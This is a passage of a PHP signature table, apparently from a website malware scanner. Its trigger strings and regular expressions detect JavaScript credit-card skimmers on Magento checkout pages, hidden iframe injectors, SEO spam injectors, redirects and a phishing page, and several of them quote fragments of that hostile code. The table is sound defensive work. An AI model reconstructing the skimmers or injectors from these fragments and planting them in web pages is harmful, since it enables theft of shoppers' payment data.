			'Glink:\'http' => array(STR_CLEAR_MULTIMATCH, 'js.malware.magento-cc-stealer.015', 'var\s*\w+\s*\=\{\s*snd\:null,\s*Glink\:[^\@]+if\(\(new RegExp\(.onepage\|checkout\|onestep[^\}]+\}'),
			'= $.noConflict(true);</scr' => array(STR_CLEAR_MULTIMATCH, 'js.malware.magento-cc-stealer.032', 'if\(\(new\s*RegExp\(.onepage\|checkout\|onestep[^\)]+\)\)\.test\(window\.location\)\)\s*{\s*document\.write\(.<script\s*src\s*=\s*.http[^>]+><.scr[^>]+><script[^>]+>var\s*\w+\s*=\s*\$\.noConflict\(true\);<.scr[^>]+><script\s*src\s*=\s*.http[^>]+><.scr[^>]+>.\);\s*};'),
			'if(resp) jQuery(\'body\').html(resp);' => array(STR_CLEAR_MULTIMATCH, 'js.malware.magento-cc-stealer.058', '[\w]+.[\w]+[\s]*=[\s]*.#[\w]+..:[\w]+.;[^\|]+RegExp\(.[\w]+\|[\w]*[^\}]+setInterval\(function\(\)\{[\s]*checkList\(\);[\s]*\},[\s]*[\d]*\);[\s]*\}[\s]*function[\s]*checkList\(\)\{[\s]*if\(jQuery\(document.shippingContainer\)\)\{[^!]+!==[\s]*undefined[\s]*[^:]+jQuery.ajax\(\{[\s]*url:[\s]*.https?:[^:]+type:[\s]*.POST.,[^\(]+\(resp\)\{[\s]*if\(resp\)[\s]*jQuery\(.body.\).html\(resp\);[\s]*\}[\s]*\}\);[\s]*\}[\s]*\}'),
			'type:"POST",dataType:"json",success:function' => array(STR_CLEAR_MULTIMATCH, 'js.malware.magento-cc-stealer.062', 'setTimeout\(function\(\)[\s]*\{document.ccNumName=.#ccsave_cc_number.,document.ccMonthName=.#ccsave_expiration[^\}]+\}\(\([\w]+=\{Address:jQuery\(.#billing[^}]+\}\).CcNumber\)\)\{var[\s]*[\w]+=JSON.stringify\([^\{]+jQuery.ajax\(\{url:[^@]+String.fromCharCode\([\w]+\[[\w]+\]\);return[\s]*[\w]+\([\w]+\)\}[\s]*\([\w]+\.encrypt\([\w]+,[\w]+\.modeOfOperation.[\w]+,[\w]+,[\w]+\)\)\}\},[\w]+\);'),
		),

		'.test(window.location))' => array(STR_TRIGGER,

			')).test(window.location) && !(new RegExp("cart").test(window.location))){' => array(STR_TRIGGER,
				'document.getElementById(\'cloud\')){document.getElementById(\'cloud\').outerHTML = "' => array(STR_CLEAR_LINEMATCH, 'js.malware.cc_stealer.011', 'function [\w]+\(\)[\s]*\{[\s]*var [\w]+[\s]*=[\s]*window\.outerWidth[\s]*-[\s]*window\.innerWidth[^\}]+\}[\s]*if\(\(new RegExp[^\}]+cloud.\)\.outerHTML[\s]*=[\s]*"[^;]+;[\s\}]+,[\s]*[\d]+[\s]*\)[\s]*;[\s]*\}'),
			),

			'{document.write(\'<script src="' => array(STR_CLEAR_MULTIMATCH, 'js.malware.magento-cc-stealer.010.02', 'if\(\(new RegExp\(.(onepage|checkout|onestep|firecheckout|one|check)[^\.]+.test.window.location\)\)[\s]*\{document.write..<scr[^)]+t>.\)\};'),
			'{document.write(\'>tpircs/<>' => array(STR_CLEAR_MULTIMATCH, 'js.malware.magento-cc-stealer.010', 'if..new RegExp..(onepage|checkout|onestep|firecheckout)[^\\.]+.test.window.location\)\)\s*\{document.write\(.>tpircs[^\)\}]+\).reverse\(\)\.join\(..\)\)\};?'),
		),

		'var __encode' => array(STR_TRIGGER,
			'=["\x5F\x64\x65\x63\x6F\x64\x65"' => array(STR_TRIGGER,
				'"\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x72\x65\x70\x6C\x61\x63\x65","\x5C\x77\x2B","\x5C\x62"' => array(STR_CLEAR_LINEMATCH, 'js.malware.injector.062', 'var __encode[\s]*=[^,]+,[\s]*_0x[\w]+[\s]*=[\s]*\[..x...x...x[^;]+\];[\s]*\(function\(_0x[\w]+\)[\s]*\{_0x[^;]+\(window\);[\s]*var[^\}]+toString\([\d]+\)\)\};[\s]*if[^\}]+\};[^\+]+\+[\s]*_0x[^\{]+,\{\}\)\);'),
			),
		),

		'\x42\x4C\x4F\x47\x20\x53\x54\x41\x52\x54\x53\x20\x48\x45\x52\x45' => array(STR_WHITE,
			'\x71\x75\x65\x72\x79\x53\x65\x6C\x65\x63\x74\x6F\x72\x41\x6C\x6C' => array(STR_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.005', 'var[\s]*_0x[\w]+=\[[^;]+.x71.x75.x65.x72.x79.x53.x65.x6C.x65.x63.x74.x6F.x72.x41.x6C.x6C[^;]+\];[^\n]*setTimeout[^\}]+\}[\s]*(,[\d]+\)\}|\}catch[^\n]+,[\d]+\))?'),
		),

		'# Author: Brad Cable' => array(STR_TRIGGER,
			'# Surrogafier v' => array(STR_CLEARFILE, 'php.hacktool.php_proxy.005', NULL),
		),
		
		'function validateCreditCard(s' => array(STR_TRIGGER,
			'decodeURI("3%20.5*%1C1' => array(STR_CLEAR_LINEMATCH, 'js.malware.cc_stealer.008', '\w+\.\w+=function.\(\).return.typeof.\w+\.\w+\.\w+(=){1,4}\'function\'\?[^!]*\![^r]*r\(var.\w=0,\w=0;[^j]*ject\"\?window:global[^Q]*Query\(function\(\w+\)[^S]*String\(\),\w+.toString\(\).length([^S]*S){1,11}tring\(\)[^c]*catch\(\w+\)\{\}\}\}\)\;\}\)\;\},\+"\d+\"\)\;\}\;'),
		),

		'addEvent(\'onload\',function(){init(options)})})({url:' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.hidden-style.013', '\(function\(\)\{var\s*[(\w+\,)]+\;\w+\=window\.device\,\w+\=\{\}\,window\.device\=\w+\,\w+\=window\.document\.documentElement\,\w+\=window\.navigator\.userAgent\.[^\&]+\&\&\s*\w+\(.iphone.\)[^\#]+=window\.location[^\{]+\{return\s*decodeURIComponent[^\!]+\!\=[^\:]+\:\s*.[http|https]+\:\/\/[(?:\w\.]+\/[(?:\w+\/\.)]+.\}\)\;'),
		'JSinj=document.createElement(\'iframe\');' => array(STR_CLEAR_MULTIMATCH, 'js.malware.iframe_injector.005', 'function [\w]+\(\)[\s]*\{[\s]*var r=new RegExp[^}]+false[\s]*\}[\s]*var [\w]+[\s]*=[\s]*new Date\(\);[\s]*[\w]+\.setTime\([^;]+;[\s]*if\(![\w]+\(\)&&window\.navigator\.cookieEnabled\)[\s]*\{[^}]+appendChild\([\w]+\)[^}]+\}[\s]*catch\([\w]+\)[\s]*\{[\s]*document\.documentElement\.appendChild[^;]+;[^}]+[}\s]+,[\s]*[\d]+[^}]+\}'),
		'undefined|ofdsfjnascjsnfstjejewqoewqsfkjdsjfdksfjbiv|reverse|x3b|orday|fer|join|epyt|height|script|new|Math|typeof|gro|Image|tpircsavaj|width|self|src|random|crs|write|location' => array(STR_CLEAR_MULTIMATCH, 'js.malware.iframe_injector.006', 'eval\(function\(p,a,c,k,e,r\)\{e=function\(\w+\){return[^}]+};if\(\!..\.replace[^}]+}];e\s*=\s*function\(\)\{return[^\|]+\|var\|document\|colorDepth\|ptth\|x2a\|escape\|tpircs\|String\|pixelDepth\|tih\|\|akrobiv\|\|function\|tpircSavaJ\|referrer\|\|sj\|prototype\|retnuoc\|pohsneg\|this\|txet\|href\|return\|URL\|\|\|ur\|\|\|vtno\|split\|\|\|egaugnal\|undefined\|ofdsfjnascjsnfstjejewqoewqsfkjdsjfdksfjbiv\|reverse\|x3b\|orday\|fer\|join\|epyt\|height\|script\|new\|Math\|typeof\|gro\|Image\|tpircsavaj\|width\|self\|src\|random\|crs\|write\|location.\.split\(.\|.\),\d+,{}\)\)'),
		'\x7C\x70\x31\x61\x69\x7C\x64\x6F\x63\x75\x6D\x65\x6E\x74\x7C' => array(STR_CLEAR_LINEMATCH, 'js.malware.injector.048.02', 'var _0x[^=]+=\[.\\\\x[^\]]+.x7C[^}]+\}[^>]+0,\{\}\)\)'),
	),

	'window' => array(STR_TRIGGER,

		'screen' => array(STR_TRIGGER,

			'function(){localStorage.setItem(' => array(STR_CHAIN_TRIGGER,
				'Math.random();}setTimeout(function(){localStorage.setItem(' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.injector.074.03', '\(function\(\)\{(try\{var localStore=window|var [\w]+=document\[[\w]+\([^\x02]+window\.localStor)[^\n]+(setItem\(.[^\}]+\}[^;]+[;\(\)\}]+|return [\w]+;\}\}\)\(\)[\};]+)'),
				'if\([\w]+===undefined\)\{var [\w]+=true;' => array(REX_CLEAR_LINEMATCH, 'js.spam-seo.injector.074.04', 'if\([\w]+===undefined\)\{var [\w]+=true;'),
			),

			')];if(ndsw===undefined){var ndsw=true;(function(){var' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.injector.074.05', 'var [\w]+=\[.text.javascript[^;]+\];[\s]*\(function[^\}]+\}+[^\]]+\];return .;\};[\s]*var [\w]+[\s]*=[\s]*\[[^\]]+\];if\(ndsw[^\n]+;\}'),
		),

		'try{q=' => array(STR_TRIGGER,
			'document.createElement("p");' => array(STR_CHAIN_TRIGGER,

				'e=window[' => array(STR_TRIGGER,
					'>[\s]*s="";' => array(REX_CLEAR_LINEMATCH, 'js.blackhole.generic.004.02', 's=""[^{]*;(?=try\{[\w]=document)'),
				),

				';if(window.document)for' => array(STR_CLEAR_MULTIMATCH, 'js.blackhole.generic.004', 'try\{[\w]=document\.createElement\("p"\);[^}]+\}[\s]*catch\([\w]+\)\{[^\*]+window\[[eval\+"]+\];[\w]=["\[]([\d]+[,.]){5}[^;]+;if\(window\.document\)for[^}]+\}[\w]+\([\w]+\);\}\}'),
			),
		),

		'document.onclick' => array(STR_TRIGGER,
			'.click(function(event)' => array(STR_TRIGGER,
				'window.atob(' => array(STR_TRIGGER,
					'.concat(hosturl,"\"},{' => array(STR_CLEAR_MULTIMATCH, 'js.malware.magento-cc-stealer.110', 'document.onclick[\s]*=[\s]*function\(\)[\s]*\{[\s]*var[\s]*isWindowProhibited[\s]*=[\s]*window.atob\([^#]+jQuery\(.#[^\]]+\{if\([\s]*check\[[^_]+Str_Component[\s]*=[\s]*Str_Component.slice\([\d]+,[^\}]+requireString,.\}\].\);[\s]*\}[^\}]+\},[\s]*error:[\s]*function[\s]*\(request, status[^\}]+[\}\);\s]+'),
				),
			),
		),

		'iframe.style.display = "none";' => array(STR_TRIGGER,
			'var iframe = document.createElement(\'iframe\');' => array(STR_TRIGGER,
				'document.body.appendChild(iframe);' => array(STR_CLEAR_MULTIMATCH, 'js.malware.injector.051', 'if\s*\(typeof\s*window\.(\w+)?\s*==\s*.undefined.\)\s*{\s*window\.\1\s*=\s*\d\s*;\s*(?:window\.onload\s*=\s*|document\.addEventListener\(.DOMContentLoaded.,\s*)function\((?:\w+)?\)\s*{\s*var\s*(\w+)\s*=\s*document\.createElement\(.\2.\)\s*;\s*\2\.style\.display\s*=\s*.none.\s*;\s*\2\.src\s*=[^;]+;\s*document\.body\.appendChild\(\2\)\s*;\s*}\s*\)?\s*;\s*}'),
			),
		),

		';try{if(Math.ceil(' => array(STR_TRIGGER,
			'.fromCharCode(eval(' => array(STR_CLEAR_MULTIMATCH, 'js.malware.iframe_injector.014', '[\w]+=String;[\s]*[\w]+=[^;]+;[\w]+=window;[\s]*[\w]+=\([\d]+\)\?[^\}]+\]\)\}catch\([\w]+\)\{[\w]+=false;try\{\}catch\([\w]+\)\{[\w]+=[\d]+;\}if\([\d]+\)\{[\w]+[^\}]+;\}[\w]+=[\w]+;[\w]+=\[\];for\([\w]+=[\d]+[^\}]+\);\}[\w]+=eval;if\(Math.ceil\([\d]+\.[\d]+\)===[\d]+\)[\w]+\([\w]+\)\}'),
		),

		'"c"+"r":2+"e"+"a"+"t"+"e"+"E' => array(STR_CLEAR_MULTIMATCH, 'js.blackhole.generic.004.03', 'try\{prototype[^\{]+\{\w=\d;\}try\{q=document[^\}]+[\s]*\}[\s]*catch[^\n]+[\s]*if\(.\).\(.\);\}'),
		'getCookie("clickund_expert' => array(STR_CLEAR_LINEMATCH, 'js.malware.unwanted-ads.013.04', 'function getCookie\(name\)[\s]*\{[\s]*var value[^}]+\}[\s]*var idToRedirect[^}]+\}\}[\s]*else[\s]*\{[^{]+clickund_expert.\)\)[\s]*\{[^}]+[\)\}]+;'),
		'window.mondrawtexture=1,window.onload=function(){' => array(STR_CLEAR_LINEMATCH, 'js.malware.iframe_injector.009', 'void\s*\d+=+window\.(\w+)\&+\(window\.\1=\d+\s*,\s*window\.onload=function\(\)\s*{\s*var\s*\w+\s*=\s*document\.create[Ee]lement\(.iframe.\)\s*;\s*\w\.style\.display=.none.\s*,\s*\w\.src=.https?:[^,]+,\s*document\.body\.append[Cc]hild\(e\)\s*}\s*\)\s*;'),
		'var cfg = window[window.popuplink_cfg_field];' => array(STR_CLEARFILE, 'php.spam-seo.fake_plugin.014.02', NULL),
		'a.appendChild(c);d.body.appendChild(a);document.cookie=n.concat(' => array(STR_CLEAR_LINEMATCH, 'js.malware.iframe_injector.011', '!function\(.,.,.,[^\)]+\)[\s]*\{[\s]*!~[\w]+\.cookie\.indexOf[^\}]+doScroll\(.[\w]+.\)\}[\s]*catch[^>]+getTime\(\)\);'),
	),

	'document.querySelector' => array(STR_TRIGGER,

		'RegExp' => array(STR_TRIGGER, 

			'var jsvalidator={' => array(STR_TRIGGER,
				'\'gi\')).test(window.location)){ jsvalidator.validate(); }' => array(STR_CLEAR_MULTIMATCH, 'js.malware.magento-cc-stealer.012', 'var jsvalidator=\{\s*snd:null,[^\}]+\{\}[^\}]+\}\)\(\'\w[^\}]+\}.\(\),\s*jsencode:[^"]+querySelectorAll."[^"]+"[^,]+\},\s*jsvalidators:.http[^"]+"a\[[^\|]+catch.e.\{\}\s*\}\s*\}\s*if..new RegExp..onepage\|[^;\{]+\{\s*jsvalidator\.validate..;\s*\}'),
			),

			'if\(\(new\s*RegExp\(\'(\w+creditcard|onepage)?\|checkout\|\w+' => array(REX_TRIGGER,
				'http.send\(.info=.\+keym\+\'&hostname=\'\+\w+\+.&key=.\+' => array(REX_CLEAR_MULTIMATCH, 'js.malware.magento-cc-stealer.020', 'var [\w]+=\{[\s]*snd:null,[\s]*[\w]+:[^,]+,[\s]*myid:\(function\(name\)\{[\s]*var matches=document.cookie.match\(new RegExp[^@]+if\(\(new RegExp..(\w+creditcard|onepage)?\|checkout(\|\w+)?[^{]+{\s*\w+\.send\(\);\s*}'),
			),

			'// Credit Card Validation Javascript' => array(STR_TRIGGER,
				'frm[i].attachEvent(\'onsubmit\', fixform);' => array(STR_CLEAR_MULTIMATCH, 'js.malware.magento-cc-stealer.009', 'var zz3=..; var zz2=..;\s*function fixform.. \{\s*zz3=zz2;.+?onsubmit., fixform.+?new XMLHttpRequest.+?.test.window.location\)\)\s*send(ajax)?\(\);'),
			),

			'function clk()' => array(STR_TRIGGER,
				'http.send("data="+' => array(STR_CLEAR_MULTIMATCH, 'js.malware.magento-cc-stealer.008', 'var snd\s*=\s*null;[^\{]+window.onload\s*=\s*function\s*\(\)\s*{[^\{]+if\s*\(\(new RegExp\([^\.]+.test\(window.location\)\)\s*{[^\{]+function\s*clk\(\)[^\\\\]+console.clear[^\']+\'send\(\)\'\s*,\s*\d+\s*\)\s*;\s*\}?'),
			),

			'location.href.search("onepagecheckout' => array(STR_TRIGGER,
				'new RegExp(atob(' => array(STR_CLEAR_MULTIMATCH, 'js.malware.magento-cc-stealer.059', 'var[\s]*[\w]+[\s]*=[\s]*[^\(]+RegExp\(atob\([^+]+url=location.hostname;[\s]*var[\s]*[\w]+[\s]*=[^\}]+JSON.stringify\([\w]+\).length\}\}[\s]*if\(setInterval\(function\(\)\{var[\s]*[\w]+[\s]*=[\s]*window.outerWidth-window[^\}]+orientation=o\)\},[\d]+\)[^\(]+location.href.search\(.onepagecheckout.\)\)[\s]*[\w]+[\s]*=[\s]*setInterval[\s]*\(function\(\)\{[\w]+\(\)\},[\d]+\);'),
			),
		),

		'"http://api.adsrun.net/post"' => array(STR_CLEAR_MULTIMATCH, 'js.malware.unwanted-adsrun.001', '\(function\(a,b,h,k\)\{function ajax\(b,a,c\)\{var d=null;[^;]+;d.open\(a\?"POST":[^\+]+\+\+\)"keywords"==[^\/\n]+"http:..api\.adsrun\.net\/post",\{"name":[^\}]+\}\);'),
		'/offers/done.php" id="frm" name="frm" class=' => array(STR_CLEARFILE, 'html.phishing.generic.078', NULL),
		'<!--[\w]+-->[\s]*<script[^>]+>[^{]+try[\s]*\{[\s]*\+[\s]*function\(\)[\s]*\{[\s]*if[\s]*\(document\.querySelector\)\+\+\(window' => array(REX_CLEAR_MULTIMATCH, 'js.malware.iframe_injector.013', '<!--[\w]+-->[\s]*<script[^>]+>[^{]+try[\s]*\{[\s]*\+function\(\)[\s]*\{[\s]*if[\s]*\(document.querySelector\)\+\+\(window\[[\w]+\].body\)==null\}\(\)\}catch\([\w]+\)[\s]*\{[\w]+[\s]*=[\s]*function\([\w]+\)[\s]*\{[\w]+[^\}]+\)\);\}\};\};[\w]+[\s]*=[\s]*\((window\.)?eval\);[^\@]+\.split\([\w]+\);[\s]*[\w]+[\s]*=[\s]*..;[\w]+\(.[\w]+.\);[\w]+\(..\+[\w]+\);\}[\s]*<.scrip[^>]+>[\s]*<!--\/[\w]+-->'),
	),

	'document.body.appendChild' => array(STR_TRIGGER,

		'document.createElement(\'iframe\')' => array(STR_TRIGGER,
			'x.style.display = "none";x.src =' => array(STR_CLEAR_LINEMATCH, 'js.malware.iframe_injector.010', 'var\s*(\w+)\s*=\s*document\.createElement\([\'"]iframe[\'"]\)\s*;\s*\1\.style\.display\s*=\s*[\'"]none[\'"]\s*;\s*\1\.src\s*=\s*[\'"]http[^;]+;\s*document\.body\.appendChild\(\1\)\s*;'),
			'document.body.appendChild(document.createElement(\'div\')).appendChild(' => array(STR_CLEAR_MULTIMATCH, 'js.malware.iframe_injector.012', 'var[\s]*[\w]+[\s]*=[\s]*document.createElement\(.iframe.\);[\w]+.src[\s]*=[\s]*.http:\/\/[\w]+[^;]+;[\w]+.width[^(]+;[\s]*document.body.appendChild\(document.createElement\(.div.\)\).appendChild\([\w]+\);'),
		),

		'document.createElement(\'script\')' => array(STR_TRIGGER,
			'atob(' => array(STR_TRIGGER,
				'aHR0cHM6Ly9' => array(STR_CLEAR_MULTIMATCH, 'php.malware.cc_stealer.018', 'var[\s]*[\w]+[\s]*=[\s]*document.createElement\(.script.\);[\s]*[\w]+\.src[\s]*=[\s]*atob\(.{50,100}\);[\s]*document.body.appendChild\([\w]+\);'),
			),
		),

		'document.createElement("script")' => array(STR_TRIGGER,
			'sagepaydirectpro_cc_number' => array(STR_CLEAR_MULTIMATCH, 'php.malware.cc_stealer.006', 'function[\s]*[\w]+\(\)[\s]*\{[\s]*var[\s]*[\w]+[\s]*=[\s]*document.getElementById\(.[\w]+:[\w]+.\).value;[^+]+\+final;[\s]*script.type[\s]*=[\s]*.text\/javascript.;[\s]*document.body.appendChild\(script\);[\s]*\}'),
			't.type="text/javascript",t.async=!0,t.src=("https:"==document.location.protocol?"https://":"http://")+window.atob(' => array(STR_CLEARFILE, 'js.malware.cc_stealer.009', 'NULL'),
		),

		'window.onload = function() { var xdg = document.createElement(\'iframe\');xdg.style.border = "none";' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.injector.063', 'window\.onload[\s]*=[\s]*function\(\)[\s]*\{[\s]*var xdg[\s]*=[\s]*document.createElement\(.iframe.\);[\s]*xdg.style.border[^\}]+document\.body\.appendChild\(xdg\);[\s]*\}[\s]*;'),
		'a.width="1px",a.height="1px",a.id=t,a.src=atob("aHR' => array(STR_CLEAR_MULTIMATCH, 'js.malware.magento-cc-stealer.047', 'function [\w]+\(\)[\s]*\{[\s]*Array\.from\(document\.getElementsByTagName\(.input.\)\)\.forEach\(function\([^\{]+\{null==[\w]+\.getAttribute\(.onchange.\)\?[\w]+\.setAttribute[^%]+url%.\+location\.hostname[^\{]+\{var[^\?]+rc=atob\(.aHR[^>]+value\.length>[^>]+value\.length>[^}]+\}\),Array\.from\(document\.getElementsByTagName\(.textarea[^}]+\}\),[\w]+\([\w]+\)\},[\w]+\)\)\};'),
		'var __calb = function() { try { if( !document || !document.body ) { window.setTimeout(__calb, 1000); return; } if(document.getElementById' => array(STR_CLEAR_MULTIMATCH, 'js.malware.iframe_injector.015', 'if\([\s]*.[\w]+.[\s]*==[\s]*typeof\([\s]*[\w]+[\s]*\)[\s]*\)[\s]*\{[\s]*var[\s]*[\w]+[\s]*=[\s]*true;[\s]*\(function\(\)[\s]*\{[\s]*try[\s]*\{[\s]*var[\s]*__[\w]+;[\s]*var[\s]*__[\w]+[\s]*=[\s]*function\(\)[\s]*\{[\s]*try[\s]*{[\s]*if[\s]*\([\s]*!document[\s]*\|\|[\s]*!document.body[\s]*\)[\s]*\{[\s]*window.setTimeout\(__[^\{]+\{[\s]*window.setTimeout\(__[\w]+,[\s]*[\d]+\);[\s]*\}[\s]*\};[\s]*__[\w]+\(\);[\s]*\}catch\([\w]+\)[\s]*\{[\s]*\}[\s]*\}[\s]*\)[\s]*\([\s]*\);[\s]*\}'),
	),

	'Histats.start' => array(STR_TRIGGER,

		'browser_name' => array(STR_TRIGGER,
			'top_txt' => array(STR_TRIGGER,
				'|link_to_file|' => array(STR_CLEAR_MULTIMATCH, 'js.malware.injector.058', 'eval\(function\(p,a,c,k,e,d[^\n]+\|link_to_file\|[^\n]+\.split\(.\|.\),0,\{\}\)\)'),
				'.link_to_file' => array(STR_CLEAR_MULTIMATCH, 'js.malware.injector.058.02', '\(function\(\$\)[\s]*\{[\s]*\$\(window\)\.load.function\(\)[\s]*\{[\s]*var[\s]*link_to_file[\s]*=[^;]+;[\s]*var _0x[\w]+[\s]*=[\s]*[^\]]+imgur[^\]]+\];[\s]*\(function\([^<]+fadeIn.\]\(\);[\s]*\},[\s]*0x[\w]+\);'),
			),
		),
	
		'|bIsFirst|' => array(STR_TRIGGER,
			'|setAdsCookie|' => array(STR_TRIGGER,
				'|sAdsUrl2|' => array(STR_CLEAR_MULTIMATCH, 'js.malware.injector.058.04', 'eval\(function\(p.a.c.k.e.d[^&]+&&[^>]+setAdsCookie[^}]+\{\}\)\)'),
			),
		),

		'document.getElementsByTagName(\'body\')[0]).appendChild(hs);' => array(STR_TRIGGER,
			'_Hasync.push([\'Histats.start' => array(STR_CLEAR_MULTIMATCH, 'js.malware.injector.058.03', '<script[^>]+>var _Hasync[^>]+body.\).....appendChild[^;]+\);[\s]*\}\)\(\);<.script>[\s]*<noscript><a href[^>]+><img[^>]+><.a><.noscript>([\s]*<script type[\s]*=[\s]*"text.javascript">[\s]*<.script>)?'),
		),
	),

	'visitorTracker' => array(STR_TRIGGER,
		'var isChrome = !isIE && !!window.chrome && window.navigator.vendor === "Google Inc.";' => array(STR_CLEAR_MULTIMATCH,'js.malware.visitor_tracker.001', '\/\*visitorTracker..\s*var \w+?in = setInterval.function...\s*if.document.body != null[^\*]+?function \w+?_isMob\(\)\{[^\*\}]+?\}\s*return false;\s*\}\/\*visitorTracker\*\/'),
		'return /(android|bb\d+|meego).+mobile' => array(STR_CLEAR_MULTIMATCH,'js.malware.visitor_tracker.001.003','\/\*visitorTracker..\s*function\s*visitortracksdel[^\*]+visitorTracker_isMob\(\)[^\*]+\/\*visitorTracker..'),
		'/*visitorTracker*/function visitortracksdel()' => array(STR_CLEAR_LINEMATCH,'js.malware.visitor_tracker.001.004','\/\*visitorTracker..\s*function\s*visitortracksdel[^\*]+visitorTracker_isMob\(\)[^\*]+\/\*visitorTracker..'),
		'<!--visitorTracker--><?php ?><!--visitorTracker-->' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.visitor_tracker.001.04', '<!--visitorTracker--><\?php\s*\?><!--visitorTracker-->'),
	),

	'=\'\';for(var' => array(STR_TRIGGER,

		')!==-1' => array(STR_TRIGGER,
			'%2===1)' => array(STR_CHAIN_TRIGGER,
				'\(function\(\)\{var [\w]+=(navigator|document)[^\n]+var [\w]+=\'\';for\(var [\w]+=[\w]+\.length-1;[^\}]+\}[\s]*return' => array(REX_CLEAR_LINEMATCH, 'js.spam-seo.injector.074', '\(function\(\)\{var [\w]+=(navigator|document)[^\n]+var [\w]+=\'\';for\(var [\w]+=[\w]+\.length-1;[^\}]+\}[\s]*return [\w]+;?[\}\)\(]+;?'),
				'if\([\w]+===undefined\)\{var [\w]+=true;' => array(REX_CLEAR_LINEMATCH, 'js.spam-seo.injector.074.02', 'if\([\w]+===undefined\)\{var [\w]+=true;'),
			),
		),

		'(function(){var root=this;var' => array(STR_TRIGGER,
			'.ico(decodeURIComponent(escape(window.atob(' => array(STR_CLEAR_LINEMATCH, 'js.malware.cc_stealer.016', '\(function\(\)\{var root=this;var[^\n]+removeChild\([^;]+;[^\}]+[\}\);]+'),
		),
	),

	'document.head.appendChild' => array(STR_TRIGGER,

		'document.createElement(' => array(STR_TRIGGER,
			'location.href.search(atob(' => array(STR_CLEAR_MULTIMATCH, 'js.malware.magento-cc-stealer.057', 'if[\s]*\(location\.href\.search\(atob\([^\)]+\)[\s]*\)[\s]*!=[\s]*-?[\d]+\)[\s]*\{[\s]*var[\s]*[\w]+[\s]*=[\s]*document\.createElement[^\)]+\);[\s]*[\w]+\.src[\s]*=[\s]*atob\([^\)]+\);[\s]*document[^\(]+appendChild\([\w]+\)[\s]*\};'),
			'if(typeof window.web_security' => array(STR_CLEAR_MULTIMATCH, 'js.malware.injector.067', 'document.addEventListener\(.DOMContentLoaded.,[\s]*function\(\)[\s]*\{[\s]*if\(typeof[\s]*window.[\w]+[\s]*==[^;]+document.createElement\(.script.\);[\s]*s.src[\s]*=[^;]+;[\s]*document.head.appendChild\([\w]+\);[\s]*window.[\w]+[\s]*=[\s]*.[\w]+.;[\s]*\}[\s]*\},[\s]*false\);'),
		),

		'importCdn.setAttribute(\'src\',' => array(STR_TRIGGER,
			'document.createElement(\'script\');' => array(STR_CLEAR_MULTIMATCH, 'js.malware.magento-cc-stealer.055', 'var[\s]*[\w]+[\s]*=[\s]*document.createElement\(.script.\);[\s]*[\w]+.setAttribute\(.src.,[\s]*[^\)\n]+\.js.\);[\s]*document.head.appendChild\([\w]+\);'),
		),
	),

	'setTimeout(function()' => array(STR_TRIGGER,
		'lmcScr' => array(STR_CHAIN_TRIGGER,
			'!iMCwO())' => array(STR_CLEAR_MULTIMATCH, 'js.malware.magento-cc-stealer.061', 'if[\s]*\([\s]*\([\s]*new[\s]*RegExp[^\{]+\{[\s]*function [\w]+\(\)[\s]*\{[\s]*var [\w]+[\s]*=[^\}]+\}[\s]*function [\w]+\([\w]+,[\s]*[\w]+\)[\s]*\{[\s]*if[\s]*\(!document[^\}]+[\s\}]+setTimeout\(function\(\)[\s]*\{[^\}]+\}[\s]*,[\s]*[^\}]+Math[^\}]+\}'),
			'\'\x23\x30\'' => array(STR_CLEAR_MULTIMATCH, 'js.malware.magento-cc-stealer.061.02', 'var _\$_[\w]+[\s]*=[\s]*\(function[^\{]+\{[\s]*var [\w]+=[\w]+\.length;[\s]*var [\w]+=\[\];[\s]*for[^\}]+charAt\([\w]+\)\};[\s]*for[^\}]+\};[\s]*var [\w]+=String\.fromCharCode[^\}]+split\(.\)\}\)\(.[^\)]+\);'),
		),
	),

	'd.getElementsByTagName(\'head\')[0].appendChild(s);' => array(STR_TRIGGER,

		'var [\w]+[\s]*=[\s]*[\d]+;[\s]*var d[\s]*=[\s]*document;[\s]*var s[\s]*=[\s]*d\.createElement' => array(REX_TRIGGER,
			'ocument.currentScript.parentNode.insertBefore(s, document.currentScript);' => array(STR_CLEAR_MULTIMATCH, 'js.redirect.mass_injection.001.03', 'var [\w]+[\s]*=[\s]*[\d]+;[\s]*var d[\s]*=[\s]*document;[\s]*var s[\s]*=[\s]*d\.createElement\(.script[^\}]+document\.currentScript\);[\s]*\}[\s]*else[\s]*\{[\s]*d\.getElementsByTagName\(.head.\)\[0\]\.appendChild\(s\);[^\}]*\}'),
		),

		'document.currentScript.parentNode.insertBefore(s, document.currentScript);' => array(STR_CLEAR_MULTIMATCH, 'js.redirect.mass_injection.001.02', 'var d[\s]*=[\s]*document;[\s]*var s[\s]*=[\s]*d\.createElement\(.script[^\}]+document\.currentScript\);[\s]*\}[\s]*else[\s]*\{[\s]*d\.getElementsByTagName\(.head.\)\[0\]\.appendChild\(s\);[\s]*\}'),
	),

	'document.cookie.indexOf(' => array(STR_TRIGGER,
		'loc7ati7on' => array(STR_CLEAR_MULTIMATCH, 'js.malware.redirect.011', 'if\s*\(document.cookie.indexOf\(.visited.\)\s*<\s*\d\)[^"]+"visited=true;\s*max-age="[^\']+\'google[^,]+.\s*\'yandex[^\]]+\];\s*var\s*[^\[]+\[.loc7ati7on[^\]]+\];\s*for\s*\(meta[^<]+<\s*len;\s*\+\+meta\)\s*\{[^>]+>\s*-\d;\s*if\(set\)window[^=]+=\s*arm\[\d\]\.replace[^,]+,\s*\'\'\);\s*\}\s*\}'),
